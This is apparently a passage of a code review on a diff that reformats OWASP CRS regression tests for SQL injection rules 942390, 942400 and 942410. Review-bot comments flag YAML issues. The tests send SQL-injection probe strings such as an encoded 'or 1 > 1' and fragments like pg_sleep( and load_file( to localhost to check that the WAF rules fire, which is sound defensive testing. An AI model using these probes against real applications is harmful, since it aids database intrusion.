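`no_log_contains` case for this rule, unlike 942400 in the same commit; a benign request using a similar phrase would be worth adding once it has been checked locally against the rule.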
@@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942390.yaml - tests: - - - test_title: 942390-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942390.yaml +tests: + - test_title: 942390-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=sdfsd%27or%201%20%3e%201" - version: HTTP/1.0 - output: - log_contains: id "942390" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log_contains: id "942390" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 5ac123380d..f27782cbe3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml 
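Review bot: `description: None` in the new `meta:` block is a YAML plain scalar, i.e. the literal string "None", not a null, so anything that reads this field gets a bogus description rather than "no description". Either drop the key or give it a real value, e.g. `description: "Regression tests for rule 942390"`; if the test runner does accept an empty value here, `description: ~` would at least make the intent explicit. The same `meta:` block is re-emitted in the 942400 and 942410 hunks below and carries the same issue.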
@@ -1,24 +1,41 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942400.yaml - tests: - - - test_title: 942400-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942400.yaml +tests: + - test_title: 942400-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - # variable name boundary attacks - data: "and '5'orig_var_datavarname=whatever" - version: HTTP/1.0 - output: - log_contains: id "942400" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log_contains: id "942400" + - test_title: 942400-2 + desc: "SQL Injection Attack - false positive" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + no_log_contains: id "942400" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 38b7e5e222..088603c0fe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml 
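Review bot: The `# variable name boundary attacks` comment above `data: "and 7 oranges"` in the new test 942400-2 was copied from 942400-1 and no longer describes the payload, which is presumably a benign phrase used to show that a word following a digit does not trip the boundary check. Replace it with something like `# benign input that resembles the boundary pattern; must not trigger 942400` so the negative test is self-explanatory. The `desc` could likewise state the expectation, e.g. `desc: "SQL Injection Attack - false positive check (must not match)"`.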
@@ -1,2013 +1,2013 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942410.yaml - tests: - - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-16 - desc: "SQL 
Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - 
log_contains: id "942410" - - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-30 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 
942410-39 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" 
- data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-49 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-54 
- desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-59 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: 
"pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-64 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "name_const(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "password/?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-77 - desc: "SQL 
Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pow(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - 
- test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sleep(" - version: 
HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - method: POST - port: 80 - uri: "/" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - 